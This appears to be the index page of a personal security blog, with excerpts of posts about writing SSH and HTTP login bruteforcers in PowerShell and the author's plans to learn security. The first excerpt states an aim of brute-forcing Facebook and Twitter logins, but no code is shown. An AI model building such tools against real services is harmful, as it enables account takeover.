As you can see we are going to be making the HTTP Bruteforcer into a function. Unlike the SSH bruteforcer which we could use wholesale without modification as all SSH servers basically function exactly the same way, unfortunately every website uses a different method or fields to login. It could be a POST or GET request, and the email or id form field could function as the username. Because of this variability in HTTP logins I think we should actually make multiple HTTP bruteforcing functions. For the sake of this article we will first make a bruceforcer for facebook, then we will make a bruceforcer for twitter.The code below will login to Facebook but I will be using it to also test the login system of every site we want to bruteforce. I have saved it as Http-Bruteforcer-Tester.ps1
To get the full story click here.

Let's Code! An Ssh Bruteforcer. by Ben from 21 Aug 2016

Since this is the first Let's Code! I am going to describe my setup and why I am doing things the way I am going to do them. I am going to do most of my early coding on this site in either powershell or C#. I use PowerGUI for coding powershell in. It has excellent syntax highlighting; and I find the variables window to be indispensable when trying to figure out what my code is doing. And for C# I use Visual Studio 2015 Community, as it is industry standard, but mainly becuase I absolutely LOVE LOVE it's indentation fixing.

I am going to be using the default powershell that comes with a fully updated Windows 10 install. I have not specifically updated powershell. But why would I not download the most up to date powershell to write my code in? I want my code to be as compatible as possible. Powershell regularly releases entire functions in new versions which will not be compatible with older versions. I know that Windows 7 uses powershell 2.0 by default and that my powershell version is 5.0(Windows 10). At work, I limit my code to 2.0 compatible only functions and code as Windows 7 is heavily deployed. At home, I am fine with running 5.0 as I only have the one Windows machine and its 10. But why am I fine with this for code intended to be used in unknown environments? Well, as we all know Microsoft has sorta been dicks about shoving Windows 10 down everyone's throats! They brag about having 300 million plus installs already. So, I would say that's a decent target base and so again to maximize compatibility I limit myself to the default version.

Ok, So with that out of the way I'll get to the meat of today's Let's Code!
To get the full story click here.

What's to come. by Ben from 20 Aug 2016

Ok.. Ok.. I have finally talked myself into starting this project. I am going to be starting 3 different series of articles. Let's Code!, Bypass.., and In The News. Let's Code! is going to be a series of articles in which I write, search for, and examine code. Bypass.. is going to be a series of articles in which I discuss various different ways to bypass different supposed security in as fun or novel of a way as possible. And lastly In The News; which is going to a be a series of articles in which I simply discuss the latest news related to security.

So why would I want to do this at all? Well, ever since I was a kid I have had a deep passion for tech and electronics. I don't know anything about security currently. I mean, not really. I've maybe done some poking and prodding before, and I have alot of skills I believe may translate. But mostly I just want to learn. I am starting in the place as that of a complete novice. I don't have a rep, or any certs, or creds, I don't really know anything. This is simply going to be my attempt to learn and document it all.

This is just the beginning. by Ben from 11 Nov 2015

This is the first post of what I hope will be many to come. This site is primarily going to consist of my thoughts and analysis of current and trending security news and topics. However, I am also currently working on unique content that I hope the security community will find valueable. I will be open sourcing tools and scripts that I am also in the process of making as well. Please check back here regularly to keep updated on my latest research.

All content on this site strictly represent my personal views and opinions; none of it represents the opinions of my employers or clients. Also all code is free for anyone to use. I found some of it, borrowed some, took a line here and there, so I think its only fair that other people can do the same with mine.